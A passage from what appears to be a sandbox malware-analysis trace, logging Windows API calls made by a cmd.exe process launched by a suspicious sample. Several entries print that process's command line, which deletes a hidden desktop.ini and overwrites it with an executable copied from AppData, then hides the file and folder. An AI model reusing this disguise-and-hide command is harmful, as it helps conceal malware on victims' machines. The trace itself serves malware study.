lpBuffer=0x12f350*, 
lpNumberOfBytesRead=0x12e540*=0x32, lpOverlapped=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] GetFileType (hFile=0x4c) returned 0x1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] GetFileType (hFile=0x4c) returned 0x1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x32, lpOverlapped=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.865] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.865] _close (_FileHandle=4) returned 0 [0150.866] FindNextFileW (in: hFindFile=0x270e60, lpFindFileData=0x12f5b4 | out: lpFindFileData=0x12f5b4) returned 0 [0150.866] GetLastError () returned 0x12 [0150.866] FindClose (in: hFindFile=0x270e60 | out: hFindFile=0x270e60) returned 1 [0150.867] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0150.867] _close (_FileHandle=3) returned 0 [0150.867] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.867] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.868] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.868] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.868] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.868] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.868] SetConsoleInputExeNameW () returned 0x1 [0150.868] GetConsoleOutputCP () returned 0x1b5 [0150.868] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.868] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.868] exit (_Code=0) Process: id = "240" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = 
"0x7ea168c0" os_pid = "0xc28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19766 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19767 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19768 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19769 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 19770 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19771 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19772 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19773 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19774 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19775 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19805 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19806 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19807 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19808 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 19809 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 19810 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19811 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19812 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19813 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19814 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19815 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19816 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19817 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19818 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19819 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 19820 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 
19821 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19822 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19823 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 19824 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 19825 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 19826 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 19827 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19828 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 19853 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 303 os_tid = 0xc98 [0150.778] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fbcc | out: lpSystemTimeAsFileTime=0x30fbcc*(dwLowDateTime=0x93cd7fa0, dwHighDateTime=0x1d440a9)) [0150.778] GetCurrentProcessId () returned 0xc28 [0150.778] GetCurrentThreadId () returned 0xc98 [0150.778] GetTickCount () returned 0x2e9e1 [0150.778] QueryPerformanceCounter (in: lpPerformanceCount=0x30fbc4 | out: 
lpPerformanceCount=0x30fbc4*=20756705042) returned 1 [0150.779] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0150.779] __set_app_type (_Type=0x1) [0150.779] __p__fmode () returned 0x76b331f4 [0150.779] __p__commode () returned 0x76b331fc [0150.779] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0150.779] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0150.779] GetCurrentThreadId () returned 0xc98 [0150.779] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc98) returned 0x38 [0150.779] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.779] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0150.779] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.780] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0150.780] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fb5c | out: phkResult=0x30fb5c*=0x0) returned 0x2 [0150.780] VirtualQuery (in: lpAddress=0x30fb93, lpBuffer=0x30fb2c, dwLength=0x1c | out: lpBuffer=0x30fb2c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.780] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fb2c, dwLength=0x1c | out: lpBuffer=0x30fb2c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0150.780] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fb2c, dwLength=0x1c | out: lpBuffer=0x30fb2c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, 
Type=0x20000)) returned 0x1c [0150.780] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fb2c, dwLength=0x1c | out: lpBuffer=0x30fb2c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.780] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fb2c, dwLength=0x1c | out: lpBuffer=0x30fb2c*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0150.780] GetConsoleOutputCP () returned 0x1b5 [0150.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.780] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0150.780] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.780] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0150.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.781] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.781] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.781] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.781] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.781] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.781] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0150.781] GetEnvironmentStringsW () returned 0x410458* [0150.782] FreeEnvironmentStringsW (penv=0x410458) returned 1 [0150.782] GetEnvironmentStringsW () returned 0x410458* [0150.782] FreeEnvironmentStringsW (penv=0x410458) returned 1 [0150.782] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eacc | out: phkResult=0x30eacc*=0x40) returned 0x0 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, 
lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x8, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x1, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x1, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x0, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x40, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x40, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x40, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.782] RegCloseKey (hKey=0x40) returned 0x0 [0150.782] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eacc | out: phkResult=0x30eacc*=0x40) returned 0x0 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: 
lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x40, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x1, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x1, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x0, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x9, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x9, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x9, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.783] RegCloseKey (hKey=0x40) returned 0x0 [0150.783] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886379 [0150.783] srand (_Seed=0x5b886379) [0150.783] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"" [0150.783] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"" [0150.783] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.784] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x411bb8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0150.784] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.784] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.784] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.784] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0150.784] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0150.784] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0150.784] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0150.784] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0150.784] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0150.784] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0150.784] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0150.784] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0150.784] GetEnvironmentStringsW () returned 0x4125a8* [0150.784] FreeEnvironmentStringsW (penv=0x4125a8) returned 1 [0150.784] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.785] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.785] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0150.785] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0150.785] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0150.785] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0150.785] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0150.785] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0150.785] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0150.785] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0150.785] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f898 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.785] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f898, lpFilePart=0x30f894 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f894*="Desktop") returned 0x18 [0150.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.785] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f614 | out: lpFindFileData=0x30f614) returned 0x410c38 [0150.785] FindClose (in: hFindFile=0x410c38 | out: hFindFile=0x410c38) returned 1 [0150.785] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f614 | out: lpFindFileData=0x30f614) returned 0x410c38 [0150.786] FindClose (in: 
hFindFile=0x410c38 | out: hFindFile=0x410c38) returned 1 [0150.786] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f614 | out: lpFindFileData=0x30f614) returned 0x410c38 [0150.786] FindClose (in: hFindFile=0x410c38 | out: hFindFile=0x410c38) returned 1 [0150.786] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.786] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0150.786] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0150.786] GetEnvironmentStringsW () returned 0x410458* [0150.786] FreeEnvironmentStringsW (penv=0x410458) returned 1 [0150.786] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.787] GetConsoleOutputCP () returned 0x1b5 [0150.787] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.787] GetUserDefaultLCID () returned 0x409 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f9d8, cchData=128 | out: lpLCData="0") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f9d8, cchData=128 | out: lpLCData="0") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f9d8, cchData=128 | out: lpLCData="1") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0150.788] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0150.789] GetConsoleTitleW (in: lpConsoleTitle=0x400a98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.790] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0150.790] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0150.790] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0150.791] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0150.791] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0150.791] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0150.791] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0150.791] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0150.791] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0150.791] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0150.793] _wcsicmp (_String1="del", _String2=")") returned 59 [0150.794] _wcsicmp (_String1="FOR", 
